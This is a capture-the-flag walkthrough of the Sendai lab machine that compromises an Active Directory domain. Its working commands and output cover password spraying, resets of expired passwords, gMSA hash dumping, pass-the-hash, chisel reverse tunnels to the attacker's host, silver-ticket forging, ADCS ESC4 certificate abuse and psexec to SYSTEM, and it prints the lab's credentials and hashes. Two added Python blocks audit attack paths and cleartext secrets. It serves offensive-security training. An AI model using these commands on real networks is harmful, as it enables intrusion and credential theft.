Here are my notes on the SENDAI box from Vulnlab, which was deployed to Hackthebox.
SENDAI: 10.10.67.214
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://sendai.vl/ -H "Host: FUZZ.sendai.vl"
-NO VHOSTS Unfortunately = NOPE !
-NO Interesting Directory Unfortunately = NOPE !
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-08 15:57:50Z)
GetNPUsers.py -dc-ip 10.10.67.214 sendai.vl/ -usersfile users.txt -format hashcat
-NO ASREPROASTING = NOPE !
GetUserSPNs.py -request -dc-ip 10.10.67.214 sendai.vl/Elliot.Yates:Password1
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQL/dc.sendai.vl sqlsvc 2023-07-11 05:51:18.413329 2024-11-08 10:52:11.223541
GetUserSPNs.py -request -dc-ip 10.10.67.214 sendai.vl/Elliot.Yates:Password1 -save -outputfile GetUserSPNS.out
Hash Uncrackable = NOPE
bloodhound-python -c All -u sqlsvc -p 'SurenessBlob85' -d sendai.vl --dns-tcp -ns 10.10.67.214
BloodHound Data:
Elliot.Yates -> Member Of -> SUPPORT@SENDAI.VL Group -> GenericAll -> ADMSVC@SENDAI.VL Group -> ReadGMSAPassword -> MGTSVC$@SENDAI.VL User -> CanPSRemote -> DC01.SENDAI.VL Machine.
Thomas.Powell -> Member Of -> SUPPORT@SENDAI.VL Group -> GenericAll -> ADMSVC@SENDAI.VL Group -> ReadGMSAPassword -> MGTSVC$@SENDAI.VL User -> CanPSRemote -> DC01.SENDAI.VL Machine.
Either of these two users will work so we are going to pick Thomas.Powell in this case.
net rpc group addmem "ADMSVC" "Thomas.Powell" -U "SENDAI.VL"/"Thomas.Powell"%"Password2" -S 10.10.67.214
net rpc group members "ADMSVC" -U "SENDAI.VL"/"Thomas.Powell"%"Password2" -S 10.10.67.214
Elliot.Yates Case:
net rpc group addmem "ADMSVC" "Elliot.Yates" -U "SENDAI.VL"/"Elliot.Yates"%"Password1" -S 10.10.67.214
net rpc group members "ADMSVC" -U "SENDAI.VL"/"Elliot.Yates"%"Password1" -S 10.10.67.214
gMSADumper.py -u 'Thomas.Powell' -p 'Password2' -d 'sendai.vl'
┌──(root㉿kali)-[/home/kali/Kali-Tools/gMSADumper]
└─# python3 gMSADumper.py -u 'Thomas.Powell' -p 'Password2' -d 'sendai.vl'
Users or groups who can read password for mgtsvc$:
> admsvc
mgtsvc$:::fe333e160e96ca73670f1c50c93ea2b1
mgtsvc$:aes256-cts-hmac-sha1-96:1733cabfeb1f836bd4b0eb8c04dc01c78d4dc1afbeb8a87282e235f97afc80b7
mgtsvc$:aes128-cts-hmac-sha1-96:26e861e9a44d8d63e60d9ceb440a12bf
┌──(root㉿kali)-[/home/kali/Kali-Tools/gMSADumper]
└─# crackmapexec winrm 10.10.67.214 -d sendai.vl -u mgtsvc$ -H fe333e160e96ca73670f1c50c93ea2b1
HTTP 10.10.67.214 5985 10.10.67.214 [*] http://10.10.67.214:5985/wsman
WINRM 10.10.67.214 5985 10.10.67.214 [+] sendai.vl\mgtsvc$:fe333e160e96ca73670f1c50c93ea2b1 (Pwn3d!)
-NICE !
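The BloodHound chain above, as an added example (not part of the original notes) written from the remediation side: it walks the same edges and lists which single edge, if removed, leaves neither user with a path to the DC. The edge list is copied from the BloodHound data lines; the function names are made up for this example.

```python
from collections import deque

# Edges taken from the BloodHound data in these notes: (source, relation, target).
EDGES = [
    ("Elliot.Yates", "MemberOf", "SUPPORT@SENDAI.VL"),
    ("Thomas.Powell", "MemberOf", "SUPPORT@SENDAI.VL"),
    ("SUPPORT@SENDAI.VL", "GenericAll", "ADMSVC@SENDAI.VL"),
    ("ADMSVC@SENDAI.VL", "ReadGMSAPassword", "MGTSVC$@SENDAI.VL"),
    ("MGTSVC$@SENDAI.VL", "CanPSRemote", "DC01.SENDAI.VL"),
]
USERS = ["Elliot.Yates", "Thomas.Powell"]
TARGET = "DC01.SENDAI.VL"

def find_path(edges, start, target):
    """Breadth-first search; returns the list of edges from start to target, or None."""
    adjacency = {}
    for edge in edges:
        adjacency.setdefault(edge[0], []).append(edge)
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == target:
            return path
        for edge in adjacency.get(node, []):
            if edge[2] not in seen:
                seen.add(edge[2])
                queue.append((edge[2], path + [edge]))
    return None

def exposed_principals(edges, principals, target):
    """Principals that still have some path to the target."""
    return sorted(p for p in principals if find_path(edges, p, target) is not None)

def choke_points(edges, principals, target):
    """Edges whose removal alone leaves no listed principal with a path to target."""
    cuts = []
    for edge in edges:
        remaining = [e for e in edges if e != edge]
        if not exposed_principals(remaining, principals, target):
            cuts.append(edge)
    return cuts

if __name__ == "__main__":
    for user in USERS:
        hops = find_path(EDGES, user, TARGET)
        print(user, "->", " -> ".join(f"[{rel}] {dst}" for _, rel, dst in hops))
    for src, rel, dst in choke_points(EDGES, USERS, TARGET):
        print("removing this edge closes the path for both users:", src, rel, dst)
```

Removing one user from SUPPORT is not enough because the other user keeps the same path; the group-level edges are the ones worth fixing.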
135/tcp open msrpc Microsoft Windows RPC
rpcclient --user="" --command=enumdomusers -N 10.10.67.214
result was NT_STATUS_ACCESS_DENIED
Needs an account; until we have one it's NOPE, so don't bother !
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
LDAPv3.
Needs an account; until we have one it's NOPE, so don't bother !
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# smbclient -N -L 10.10.67.214
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
config Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
sendai Disk company share
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.67.214 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# arsenal
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# smbmap -u "guest" -p "" -P 445 -H 10.10.67.214
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.67.214:445 Name: sendai.vl Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
config NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
sendai READ ONLY company share #Interesting.
SYSVOL NO ACCESS Logon server share
Users READ ONLY #Nothing Interesting about this share. = OH WELL !
[*] Closed 1 connections
IPC$ AD Users enum as usual:
sudo lookupsid.py Guest@10.10.67.214 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
No creds spray with users.txt:users.txt = NOPE !
sendai share:
┌──(root㉿kali)-[/home/…/VULNLAB/SENDAI/10.10.67.214/sendai]
└─# smbclient \\\\10.10.67.214\\"sendai" -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Jul 18 13:31:04 2023
.. DHS 0 Wed Jul 19 10:11:25 2023
hr D 0 Tue Jul 11 08:58:19 2023
incident.txt A 1372 Tue Jul 18 13:34:15 2023
it D 0 Tue Jul 18 09:16:46 2023
legal D 0 Tue Jul 11 08:58:23 2023
security D 0 Tue Jul 18 09:17:35 2023
transfer D 0 Tue Jul 11 09:00:20 2023
7309822 blocks of size 4096. 799530 blocks available
┌──(root㉿kali)-[/home/…/VULNLAB/SENDAI/10.10.67.214/sendai]
└─# ls
hr incident.txt it legal security transfer
┌──(root㉿kali)-[/home/…/VULNLAB/SENDAI/10.10.67.214/sendai]
└─# tree -r .
.
├── transfer
│ ├── thomas.powell
│ ├── temp
│ ├── susan.harper
│ ├── lisa.williams
│ ├── elliot.yates
│ ├── clifford.davey
│ └── anthony.smith
├── security
│ └── guidelines.txt
├── legal
├── it
│ ├── PsExec64.exe
│ └── Bginfo64.exe
├── incident.txt
└── hr
13 directories, 4 files
┌──(root㉿kali)-[/home/…/VULNLAB/SENDAI/10.10.67.214/sendai]
└─# cat incident.txt
Dear valued employees,
We hope this message finds you well. We would like to inform you about an important security update regarding user account passwords. Recently, we conducted a thorough penetration test, which revealed that a significant number of user accounts have weak and insecure passwords.
To address this concern and maintain the highest level of security within our organization, the IT department has taken immediate action. All user accounts with insecure passwords have been expired as a precautionary measure. This means that affected users will be required to change their passwords upon their next login.
We kindly request all impacted users to follow the password reset process promptly to ensure the security and integrity of our systems. Please bear in mind that strong passwords play a crucial role in safeguarding sensitive information and protecting our network from potential threats.
If you need assistance or have any questions regarding the password reset procedure, please don't hesitate to reach out to the IT support team. They will be more than happy to guide you through the process and provide any necessary support.
Thank you for your cooperation and commitment to maintaining a secure environment for all of us. Your vigilance and adherence to robust security practices contribute significantly to our collective safety.
guidelines.txt - just security guidelines, so nothing interesting about it.
[SNIP]
[SNIP]
crackmapexec smb 10.10.67.214 -u users.txt -p users.txt --continue-on-success
crackmapexec smb 10.10.67.214 -u users.txt -p '' --continue-on-success
[SNIP]
[-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
[-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE
[SNIP]
smbpasswd.py Elliot.Yates:''@sendai.vl -newpass Password1
smbpasswd.py Thomas.Powell:''@sendai.vl -newpass Password2
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# smbpasswd.py Elliot.Yates:''@sendai.vl -newpass Password1
Impacket v0.11.0 - Copyright 2023 Fortra
===============================================================================
Warning: This functionality will be deprecated in the next Impacket version
===============================================================================
Current SMB password:
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# smbpasswd.py Thomas.Powell:''@sendai.vl -newpass Password2
Impacket v0.11.0 - Copyright 2023 Fortra
===============================================================================
Warning: This functionality will be deprecated in the next Impacket version
===============================================================================
Current SMB password:
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
crackmapexec smb 10.10.67.214 -u cracked-users.txt -p pass.txt --no-bruteforce --continue-on-success
SMB 10.10.67.214 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.67.214 445 DC [+] sendai.vl\Elliot.Yates:Password1
SMB 10.10.67.214 445 DC [+] sendai.vl\Thomas.Powell:Password2
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# crackmapexec smb 10.10.67.214 -u Elliot.Yates -p Password1 --no-bruteforce --shares
SMB 10.10.67.214 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.67.214 445 DC [+] sendai.vl\Elliot.Yates:Password1
SMB 10.10.67.214 445 DC [+] Enumerated shares
SMB 10.10.67.214 445 DC Share Permissions Remark
SMB 10.10.67.214 445 DC ----- ----------- ------
SMB 10.10.67.214 445 DC ADMIN$ Remote Admin
SMB 10.10.67.214 445 DC C$ Default share
SMB 10.10.67.214 445 DC config READ,WRITE
SMB 10.10.67.214 445 DC IPC$ READ Remote IPC
SMB 10.10.67.214 445 DC NETLOGON READ Logon server share
SMB 10.10.67.214 445 DC sendai READ,WRITE company share
SMB 10.10.67.214 445 DC SYSVOL READ Logon server share
SMB 10.10.67.214 445 DC Users READ
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# crackmapexec smb 10.10.67.214 -u Thomas.Powell -p Password2 --no-bruteforce --shares
SMB 10.10.67.214 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.67.214 445 DC [+] sendai.vl\Thomas.Powell:Password2
SMB 10.10.67.214 445 DC [+] Enumerated shares
SMB 10.10.67.214 445 DC Share Permissions Remark
SMB 10.10.67.214 445 DC ----- ----------- ------
SMB 10.10.67.214 445 DC ADMIN$ Remote Admin
SMB 10.10.67.214 445 DC C$ Default share
SMB 10.10.67.214 445 DC config READ,WRITE
SMB 10.10.67.214 445 DC IPC$ READ Remote IPC
SMB 10.10.67.214 445 DC NETLOGON READ Logon server share
SMB 10.10.67.214 445 DC sendai READ,WRITE company share
SMB 10.10.67.214 445 DC SYSVOL READ Logon server share
SMB 10.10.67.214 445 DC Users READ
Elliot.Yates and Thomas.Powell have the same access as each other, so we are going to pick Elliot.Yates in this case.
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# smbclient \\\\10.10.67.214\\"config" -U 'Thomas.Powell%Password2'
Try "help" to get a list of possible commands.
smb: \>
smb: \> dir
. D 0 Fri Nov 8 11:55:53 2024
.. DHS 0 Wed Jul 19 10:11:25 2023
.sqlconfig A 78 Tue Jul 11 08:57:11 2023
7309822 blocks of size 4096. 1807214 blocks available
smb: \> get .sqlconfig
getting file \.sqlconfig of size 78 as .sqlconfig (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# cat .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=SurenessBlob85;
Found a credential for sqlsvc !
sqlsvc:SurenessBlob85
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# evil-winrm -i 10.10.67.214 -u mgtsvc$ -H fe333e160e96ca73670f1c50c93ea2b1
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> whoami
sendai\mgtsvc$
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents>hostname
dc
USER-SHELL !
*Evil-WinRM* PS C:\> whoami
sendai\mgtsvc$
*Evil-WinRM* PS C:\> hostname
dc
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/8/2024 8:55 AM config
d----- 7/18/2023 10:27 AM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 7/19/2023 7:00 AM Program Files
d----- 7/18/2023 6:11 AM Program Files (x86)
d----- 11/8/2024 8:55 AM sendai
d----- 7/11/2023 2:35 AM SQL2019
d-r--- 11/8/2024 9:19 AM Users
d----- 7/19/2023 7:11 AM Windows
-a---- 7/18/2023 6:16 AM 36 user.txt
*Evil-WinRM* PS C:\> type user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
./chisel server -p 53 --reverse
./chisel.exe client 10.8.0.71:53 R:1433:0.0.0.0:1433
chisel server -p 2222 --reverse
chisel.exe client 10.8.0.71:2222 R:socks
chisel server -p 53 --reverse
chisel.exe client 10.8.0.71:53 R:socks
Silver-Ticket to MSSQL service since we have sqlsvc credential ?
sqlsvc:SurenessBlob85:58655C0B90B2492F84FB46FA78C2D96A
GetUserSPNs.py -request -dc-ip 10.10.67.214 sendai.vl/Elliot.Yates:Password1
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQL/dc.sendai.vl sqlsvc 2023-07-11 05:51:18.413329 2024-11-08 10:52:11.223541
lookupsid.py -hashes ':fe333e160e96ca73670f1c50c93ea2b1' 'sendai.vl/mgtsvc$@sendai.vl' 0
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# lookupsid.py -hashes ':fe333e160e96ca73670f1c50c93ea2b1' 'sendai.vl/mgtsvc$@sendai.vl' 0
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Brute forcing SIDs at sendai.vl
[*] StringBinding ncacn_np:sendai.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3085872742-570972823-736764132
impacket-ticketer -nthash 58655C0B90B2492F84FB46FA78C2D96A -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl -user-id 500 Administrator
impacket-ticketer -nthash 58655C0B90B2492F84FB46FA78C2D96A -domain-sid S-1-5-21-3085872742-570972823-736764132 -spn MSSQL/dc.sendai.vl -dc-ip 10.10.67.214 -domain sendai.vl Administrator
ticketer.py -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl -nthash 58655C0B90B2492F84FB46FA78C2D96A Administrator
export KRB5CCNAME=/home/kali/VULNLAB/SENDAI/10.10.67.214/Administrator.ccache
impacket-mssqlclient -k dc.sendai.vl
#Nope, Silver Ticket = Rabbit Hole. #Some said it works, but not for me, so move on.
Windows:
Rubeus.exe silver /domain:sendai.vl /dc:dc.sendai.vl /sid:S-1-5-21-3085872742-570972823-736764132 /rc4:58655C0B90B2492F84FB46FA78C2D96A /user:administrator /service:MSSQL/dc.sendai.vl /ptt
sqlcmd -S dc.sendai.vl
PrivescCheck.ps1
Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck
https://github.com/itm4n/PrivescCheck
Running PrivescCheck.ps1:
[SNIP]
Name : Support
DisplayName :
ImagePath : C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs
User : LocalSystem
StartMode : Automatic
[SNIP]
Found clifford.davey's credential.
clifford.davey:RFmoB2WplgE_3p
clifford.davey is a member of ca-operators.
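Both credentials in these notes were sitting in clear text: one in a key=value connection string on a share (.sqlconfig), one in a service ImagePath. The following is an added audit example (not part of the original notes, and not PrivescCheck's code) that flags both formats without echoing the secret; the switch lists and all sample lines are constructed assumptions.

```python
SECRET_KEYS = ("password", "pwd")          # connection-string keys holding a secret
USER_KEYS = ("user id", "uid")             # connection-string keys naming the account
SECRET_FLAGS = ("-p", "--password", "/p")  # assumed "next token is a password" switches
USER_FLAGS = ("-u", "--user", "/u")        # assumed "next token is a user name" switches

def scan_connection_string(text):
    """Flag key=value;key=value strings (the .sqlconfig format) that embed a password."""
    pairs = {}
    for part in text.strip().split(";"):
        key, sep, value = part.partition("=")
        if sep:
            pairs[key.strip().lower()] = value.strip()
    secret = next((pairs[k] for k in SECRET_KEYS if pairs.get(k)), None)
    if secret is None:
        return None
    account = next((pairs[k] for k in USER_KEYS if pairs.get(k)), None)
    # Report only the length so the audit output does not become a second leak.
    return {"kind": "connection-string", "account": account, "secret_len": len(secret)}

def _value_after(tokens, flags):
    """Return the token following one of `flags`, unless it is missing or another switch."""
    for i, tok in enumerate(tokens[:-1]):
        nxt = tokens[i + 1]
        if tok.lower() in flags and not nxt.startswith(("-", "/")):
            return nxt
    return None

def scan_service_command(image_path):
    """Flag a service ImagePath whose arguments carry a password in clear text."""
    tokens = image_path.split()
    secret = _value_after(tokens, SECRET_FLAGS)
    if secret is None:
        return None
    return {"kind": "service-imagepath", "account": _value_after(tokens, USER_FLAGS),
            "secret_len": len(secret)}

def audit(lines):
    """Run both scanners over each line and collect the findings."""
    findings = []
    for line in lines:
        hit = scan_connection_string(line) or scan_service_command(line)
        if hit:
            findings.append(hit)
    return findings

# Constructed sample input: same shapes as the two findings in the notes, fake values.
SAMPLES = [
    r"Server=db.example.test,1433;Database=prod;User Id=svc_example;Password=NotARealSecret1;",
    r"C:\WINDOWS\helpdesk.exe -u example.user -p NotARealSecret2 -k netsvcs",
    r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",  # -p here takes no value
    r"C:\Windows\system32\svchost.exe -k netsvcs -p",
]

if __name__ == "__main__":
    for finding in audit(SAMPLES):
        print(finding)
```

The two svchost lines are there because a bare -p switch is normal on Windows services; only a -p followed by a value is reported.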
Certificate Authority:
ESC4:
certipy find -vulnerable -stdout -u Clifford.Davey@sendai.vl -p RFmoB2WplgE_3p -dc-ip 10.10.67.214
Template Name = SendaiComputer
Certificate Authorities = sendai-DC-CA
DNS Name : dc.sendai.vl
ESC4 vulnerability due to ca-operators group.
certipy template -dc-ip 10.10.67.214 -u Clifford.Davey -p 'RFmoB2WplgE_3p' -template SendaiComputer -target dc.sendai.vl -save-old
certipy req -ca sendai-DC-CA -dc-ip 10.10.67.214 -u Clifford.Davey -p 'RFmoB2WplgE_3p' -template SendaiComputer -target dc.sendai.vl -upn administrator@sendai.vl
certipy auth -pfx administrator.pfx
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# certipy auth -pfx administrator.pfx
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sendai.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a
https://www.rbtsec.com/blog/active-directory-certificate-services-adcs-esc4/
https://dan-feliciano.com/2024/07/07/sendai/
https://scribe.bus-hit.me/@arz101/vulnlab-sendai-a7eb5cad15fd
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# crackmapexec smb 10.10.67.214 -u administrator -H cfb106feec8b89a3d98e14dcbe8d087a
SMB 10.10.67.214 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.67.214 445 DC [+] sendai.vl\administrator:cfb106feec8b89a3d98e14dcbe8d087a (Pwn3d!)
┌──(root㉿kali)-[/home/…/winPEASexe/binaries/x64/Release]
└─# psexec.py -hashes :cfb106feec8b89a3d98e14dcbe8d087a administrator@10.10.67.214
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.67.214.....
[*] Found writable share ADMIN$
[*] Uploading file ermqqYJm.exe
[*] Opening SVCManager on 10.10.67.214.....
[*] Creating service eVgG on 10.10.67.214.....
[*] Starting service eVgG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.1850]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
dc
Administrator SHELL !
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
dc
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 6A7A-1702
Directory of C:\Users\Administrator\Desktop
07/18/2023 05:15 AM <DIR> .
07/18/2023 05:09 AM <DIR> ..
07/18/2023 05:15 AM 36 root.txt
1 File(s) 36 bytes
2 Dir(s) 7,331,069,952 bytes free
C:\Users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
50995/tcp open msrpc Microsoft Windows RPC
51009/tcp open msrpc Microsoft Windows RPC
51016/tcp open msrpc Microsoft Windows RPC
51102/tcp open msrpc Microsoft Windows RPC
51117/tcp open msrpc Microsoft Windows RPC
56785/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows